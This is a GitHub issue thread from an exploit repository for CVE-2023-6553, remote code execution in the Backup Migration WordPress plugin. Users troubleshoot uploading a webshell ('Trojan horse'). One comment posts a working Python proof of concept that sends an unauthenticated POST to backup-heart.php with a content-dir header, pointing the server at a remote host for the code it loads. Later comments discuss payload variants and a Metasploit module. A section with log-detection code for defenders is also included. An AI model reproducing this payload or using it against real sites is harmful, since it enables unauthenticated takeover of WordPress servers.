Chocapikk / CVE-2023-6553

Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution
https://www.wordfence.com/blog/2023/12/critical-unauthenticated-remote-code-execution-found-in-backup-migration-plugin/

404 not found #1

Open zzZxby opened 9 months ago

zzZxby commented 9 months ago

I used version 1.3.6 of backup-backup for testing, but it returned a 404 error and the Trojan horse was not successfully uploaded. What could be the reason for this?

Chocapikk commented 9 months ago

Yeah, I have to add more checks in the code. Not yet reliable enough. It's a v1. I will take care of it soon. Thanks for the feedback.

Chocapikk commented 9 months ago

I just got it. I assume you are using Windows. Due to the header length limit I use a system command to write the webshell. Except it's a Linux command and not Windows. That's why it's not working here. And I only check the status code and not the length of the content of /includes/backup-heart.php to verify that the characters are correctly written on the server.

zzZxby commented 9 months ago

I've fixed this, thank you very much.

Chocapikk commented 9 months ago

Can you make a PR or share what you did? I could also modify it for Windows ^^ Thanks

zzZxby commented 9 months ago

I wrote a simple Python script to send packets myself and didn't use your exploit.

zzZxby commented 9 months ago

```python
import requests

url = 'http://172.18.1.141:80/wordpress/wp-content/plugins/backup-backup/includes/backup-heart.php'
content_dir = 'http://172.18.1.2:8000/'

headers = {'content-dir': content_dir}
response = requests.post(url, headers=headers)

print(response.text)  # handle the response data
```
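For anyone on the defending side of this thread: the request above is a direct, unauthenticated POST to the plugin's `includes/backup-heart.php`, and that path is something an ordinary web-server access log does record, even though the custom `content-dir` header is not. The following is an added example (not code from this issue or from the repository) that parses constructed Apache combined-format log lines and reports every client that hit that file. It assumes the standard combined log format and the plugin path exactly as it appears in the PoC; the log lines and IPs are made up for the example.

```python
import re

# Constructed sample of Apache combined-format access log lines (not taken from
# the thread). Lines 3 and 4 model direct requests to the plugin's
# backup-heart.php, the endpoint the PoC above posts to.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2023:10:01:02 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Dec/2023:10:01:05 +0000] "GET /wordpress/wp-content/plugins/backup-backup/assets/css/style.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
172.18.1.2 - - [12/Dec/2023:10:02:11 +0000] "POST /wordpress/wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1" 200 0 "-" "python-requests/2.31.0"
172.18.1.2 - - [12/Dec/2023:10:02:12 +0000] "GET /wordpress/wp-content/plugins/backup-backup/includes/backup-heart.php?x=1 HTTP/1.1" 404 196 "-" "python-requests/2.31.0"
"""

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The include the PoC targets; matched on the path with any query string removed,
# so the plugin may be installed under any WordPress prefix.
TARGET_RE = re.compile(r'/wp-content/plugins/backup-backup/includes/backup-heart\.php$')


def parse_line(line):
    """Return a dict of the combined-log fields, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    return rec


def find_backup_heart_hits(log_text):
    """Return the parsed records whose request path is backup-heart.php."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path_only = rec['path'].split('?', 1)[0]
        if TARGET_RE.search(path_only):
            hits.append(rec)
    return hits


def summarize_by_client(hits):
    """Group hits per client IP: request count, status codes seen, user agents seen."""
    summary = {}
    for rec in hits:
        entry = summary.setdefault(rec['ip'], {'count': 0, 'statuses': set(), 'user_agents': set()})
        entry['count'] += 1
        entry['statuses'].add(rec['status'])
        entry['user_agents'].add(rec['ua'])
    return summary


if __name__ == '__main__':
    for ip, info in summarize_by_client(find_backup_heart_hits(SAMPLE_LOG)).items():
        print(f"{ip}: {info['count']} request(s) to backup-heart.php, "
              f"statuses {sorted(info['statuses'])}, user agents {sorted(info['user_agents'])}")
```

A hit here is worth investigating regardless of the status code: the thread itself shows both 404 and 200 responses from attempts that did and did not land. To see the `content-dir` header, pair this with a WAF or mod_security log that records request headers; the real fix is updating the plugin past the affected 1.3.7.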

zzZxby commented 9 months ago

Thank you very much again.

Chocapikk commented 9 months ago

Oh ok, I understand, you used a remote URL to use a shell. Yeah, great. Not sure if it will work with all web server configs. Thanks also.

N00BIER commented 7 months ago

Guys, any reason the filter chain might not work (other than the HTTP header size limit)?

Web Server - Apache 2.4/Ubuntu 22.04
Plugin - 1.3.6/1.3.7

I get 200 response but nothing really happens in the end.

Chocapikk commented 7 months ago

Okay. Well, it's surprising, was a file still written to your lab? Recently I modified the payload to native PHP and it worked. Without more information I can't know.

N00BIER commented 7 months ago

> Okay. Well, it's surprising, was a file still written to your lab? Recently I modified the payload to native PHP and it worked. Without more information I can't know.

Nothing gets uploaded to /includes. I've also increased the HTTP header size limit... I am using a web server (Apache 2.4) in a Docker container listening on http://X.X.X.X:8000. WordPress 6.0.1 with Backup Migration 1.3.7.

Chocapikk commented 7 months ago

Honestly, I don't have a solution at this point. It's already complicated enough to exploit. Feel free to debug; if you have a solution I will update it. There was recently a Metasploit module that does this. Have you tried with that too?

N00BIER commented 7 months ago

For some reason Metasploit (Kali) fails to load the module multi/http/wp_backup_migration_php_filter. The framework is up to date, v6.3.51-dev.

Chocapikk commented 7 months ago

Okay, so I have no idea either. Open an issue with Metasploit in this case. Sorry.

N00BIER commented 7 months ago

No problem, I'll get back if I have any findings.